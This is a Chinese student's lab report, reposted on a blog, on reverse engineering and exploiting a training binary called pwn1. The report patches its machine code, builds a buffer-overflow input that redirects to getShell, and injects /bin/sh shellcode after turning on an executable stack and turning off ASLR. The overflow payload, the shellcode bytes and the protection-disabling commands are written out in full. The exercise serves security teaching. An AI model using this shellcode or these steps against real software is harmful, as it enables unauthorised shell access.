2018-2019-2 20165237《网络攻防技术》Exp1 PC平台逆向破解

最新推荐文章于 2024-11-08 14:24:57 发布
最新推荐文章于 2024-11-08 14:24:57 发布
阅读量90 收藏
点赞数
文章标签: 操作系统 系统安全 shell
原文链接:http://www.cnblogs.com/Miss-moon/p/10542405.html
版权

2018-2019-2 20165237《网络攻防技术》Exp1 PC平台逆向破解

一、实践目标

  • 本次实践的对象是一个名为pwn1的linux可执行文件。

  • 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。

  • 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。

二、基础知识

  • 熟悉Linux基本操作
  • 能看懂常用指令,如管道(|),输入、输出重定向(>)等。
  • 理解Bof的原理。
  • 能看得懂汇编、机器指令、EIP、指令地址。
  • 会使用gdb,vi。
  • 缓冲区溢出概图:
    1298409-20190316150411869-632856639.jpg

三、Exp1.1 直接修改程序机器指令,改变程序执行流程

实验步骤:
  • 反汇编:查看pwn20165237的代码机器指令和汇编语言
objdump -d pwn20165237 | more

1298409-20190316145954981-1602025060.png

  • 进行编辑:
vi pwn20165237

在vi里面进行以下步骤

  • 使用 :%!xxd显示模式切换为16进制模式
  • 使用 /e8d7查找要修改的内容
    ,并将d7修改成c3,保存并退出

  • 将16进制转换回原格式 :%!xxd -r,:wq!退出
    1298409-20190316150101675-1190025510.png

  • 进行反汇编查看机器指令和汇编语言
objdump -d pwn20165237 | more

1298409-20190316150236993-2099029512.png

  • 验证:
./pwn20165237

1298409-20190316150315590-1070102059.png

四、Exp1.2通过构造输入参数,造成BOF攻击,改变程序执行流

实验步骤
  • 确认返回地址:
objdump -d pwn5237 | more

查看getshell()的内存地址
1298409-20190316150508561-1712195897.png

  • 对pwn5237进行GDB调试,运行并输入进行尝试 1111111122222222333333334444444412345678
    1298409-20190316150541461-413431151.png

  • 得到ASCII码值 0x34333231 也就是倒序的1234
    我们需要将其替换成getshell的返回地址 0x0804847d

  • 生成包含字符串的文件

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
  • 使用命令
(cat input;cat) | ./pwn5237

将input的内容作为./pwn5237的输入,并验证结果
1298409-20190316150722918-1569480510.png

五、Exp1.3Shellcode注入攻击

 安装execstack:apt-get install execstack

 设置堆栈可执行: execstack -s pwn1    

 查询文件的堆栈是否可执行: execstack -q pwn1  

 关闭地址随机化: echo "0" > /proc/sys/kernel/randomize_va_space 

 查看地址随机化是否已经关闭: more /proc/sys/kernel/randomize_va_space

1298409-20190316150746180-1017132945.png

  • 注入攻击
    1298409-20190316150805564-1968433709.png

  • 再打开一个终端Ctrl+Alt+t,找到进程号为33071

  • 使用gdb调试进程
gdb pwn1

attach 33071

disassemble foo

break *0x080484ae

continue

info r esp

x/16x 0xffffd30c

1298409-20190316150937343-1661852955.png

  • 通过计算,得到shellcode的地址是0xffffd310
    1298409-20190316150959465-947338290.png

  • 输入指令:
perl -e 'print "A" x 32;print "\x10\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x20\xd3\xff\xff\x00"' > input_shellcode
  • 验证:
    1298409-20190316151015437-906995173.png

六、实验感想与问题

  • 感想:这次实验,通过和舍友的讨论以及百度的帮助让我对缓冲区溢出攻击有了更深刻的认识,尤其是栈的溢出与替换;实验操作过程中根据指导书按部就班得做没有什么困难,希望能够再接再厉,学到更多有用的知识!

  • 什么是漏洞?漏洞有什么危害?

答:漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。本次实验的缓冲区溢出原理就是一个漏洞。他们会使计算机遭受病毒和黑客攻击,将自己的私人信息泄露出去。

转载于:https://www.cnblogs.com/Miss-moon/p/10542405.html

weixin_30883311
关注
[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
20155321 《网络攻防Exp1 PC平台逆向破解(5)M
weixin_30367169的博客
03-08 88
20155321 《网络攻防Exp1 PC平台逆向破解(5)M 实践目标 本次实践的对象是linux的可执行文件 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学...
20145332 《网络攻防逆向与Bof实验
weixin_30810583的博客
02-28 117
20145332 《网络攻防逆向与Bof实验 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。这次实验的目标就是想办法运行这个代码片段。 我们将学习两种方法: ①...
20155235 《网络攻防》 实验一 逆向及Bof基础实践说明
weixin_30444105的博客
03-18 356
20155235 《网络攻防》 实验一 逆向及Bof基础实践说明 实验目的 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方...
南京邮电大学网络攻防训练平台逆向第二题ReadAsm2
u014738665的博客
11-27 439
1、题目需求 读汇编是逆向基本功。 给出的文件是func函数的汇编 main函数如下 输出的结果即为flag,格式为flag{**********},请连flag{}一起提交 编译环境为linux gcc x86-64 调用约定为System V AMD64 ABI请不要利用汇编器,IDA等工具。。这里考的就是读汇编与推算汇编结果的能力 int main(int argc, char c...
# 2018-2019-2 20165210《网络攻防技术Exp1 PC平台逆向破解(BOF实验)
aomangsheng3817的博客
03-17 299
2018-2019-2 20165210《网络攻防技术Exp1 PC平台逆向破解(BOF实验) 实验分为三个部分: 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数 注入一个自己制作的shellcode并运行这段shellcode。 这几种思路,基本代表现实情况中的攻击...
20210130Mikrotik路由器SMB缓冲区溢出漏洞(CVE-2018-7445)复现
qq_45290991的博客
02-01 2511
终于考完了大学最后需要考试的三门课,结果突然间通知不能放假,并且还要封口,那我没办法,只好开始了毕设,老师让先复现几个路由器的漏洞,然后学学《家用路由器0day漏洞》。所以,我们开始吧,我参考了如下几篇博客,间接感谢大佬的智慧: 大纲资料:https://blog.csdn.net/qq_41453285/article/details/102154900 漏洞简述:https://www.coresecurity.com/core-labs/advisories/mikrotik-route...
攻防比赛中系统层漏洞挖掘-身份隐藏解决方案
maoguan121的博客
10-13 1105
为避免自己的真实IP、物理位置、设备特征等信息在远程入侵的 过程中被网络安全设备记录,甚至被溯源追踪,攻击者一般都会利用 各种方式来进行身份隐藏。在实战攻防演练中,蓝队所采用的身份隐 藏技术主要有以下几类:匿名网络、盗取他人ID/账号、使用跳板机、 他人身份冒用和利用代理服务器等。
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 1475
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
红队专题-Web安全/渗透测试-注入攻击
aming小老弟
10-27 213
Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞, 其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
2018护网杯逆向题目
10-16
2018护网杯的3道逆向题目.
南京邮电大学网络攻防训练平台逆向第一题Hello,RE!
u014738665的博客
11-27 608
1、打开OD或则IDA直接看,送分题 2、结果是:flag{Welcome_To_RE_World!}
20155213 《网络攻防Exp1 PC平台逆向破解
weixin_30867015的博客
03-11 93
20155213 《网络攻防Exp1 PC平台逆向破解(5)M 实践内容 通过对实践对象——pwn20155213的linux可执行文件的修改或输入,完成以下三块: 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 注入一个自己制作的shellcode并运行这段shellco...
自学网络安全,一般人我劝你放弃吧!
bdfcfff77fa的博客
02-11 640
自学黑客,一般人我劝你放弃吧
[安全攻防进阶篇] 一.什么是逆向分析、逆向分析应用及经典扫雷游戏逆向
热门推荐
杨秀璋的专栏
07-28 3万+
安全攻防进阶篇将更加深入的去研究恶意样本分析、逆向分析、内网渗透、网络攻防实战等。第一篇文章先带领大家学习什么是逆向分析,然后详细讲解逆向分析的典型应用,接着通过OllyDbg工具逆向分析经典的游戏扫雷,再通过Cheat Engine工具复制内存地址获取,实现一个自动扫雷程序。基础性文章,西电UI您有所帮助~
南京邮电大学网络攻防训练平台逆向第四题WxyVM
u014738665的博客
02-13 519
1、IDA静态分析 总结: 1、1:长度必须是0x18 1、2:v4必须是==1 1、3:循环比较InputBuff[X]==dword_601060[X]   2、分析sub_4005B6函数(VStartVM) 2、1:F5伪代码 总结: 这是一个典型的VM框架 扩展知识(参考加密与解密3): 虚拟机保护技术就是基于x86汇编系统的可执行代码转换为字节码指令系统的...
【python GUI编码入门-21】如何用Tkinter创建一个记事本应用
木头大左的博客
11-08 41
在现代编程环境中,图形用户界面(GUI)应用程序的开发变得越来越重要。Python的Tkinter库是一个功能强大且易于使用的GUI工具包,非常适合初学者和有经验的开发者使用。本文将详细介绍如何使用Tkinter创建一个简易的记事本应用,涵盖从安装到实现各项功能的全过程。Tkinter是Python的标准GUI库,它提供了丰富的接口来创建窗口、对话框、按钮等常见的GUI组件。Tkinter具有良好的跨平台性,可以在Windows、Mac OS和Linux上运行。
linux rocky 9.4部署和管理docker harbor私有源
最新发布
xikui1551的博客
11-08 804
rocky 部署Harbor私有镜像仓库
linux-find和zgrep
luxideyao的专栏
11-07 304
命令本身并不支持递归搜索,它只能搜索单个压缩文件。但是,你可以结合使用。如果你想要搜索所有类型的压缩文件,你可以使用。是你想要搜索的目录的路径。是你想要搜索的文本模式,文件,你可能需要使用。文件并搜索其中的内容。作为输入文件的占位符。
网络安全攻防实战平台:Attack-Defense-Framework 2
综上所述,Attack-Defense-Framework-2.zip为网络安全领域的专业人士提供了一个功能全面、操作简便、高度仿真的网络攻防模拟平台。通过使用该框架,用户不仅能够提升个人技能,还能够为保护网络空间的安全做出贡献。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值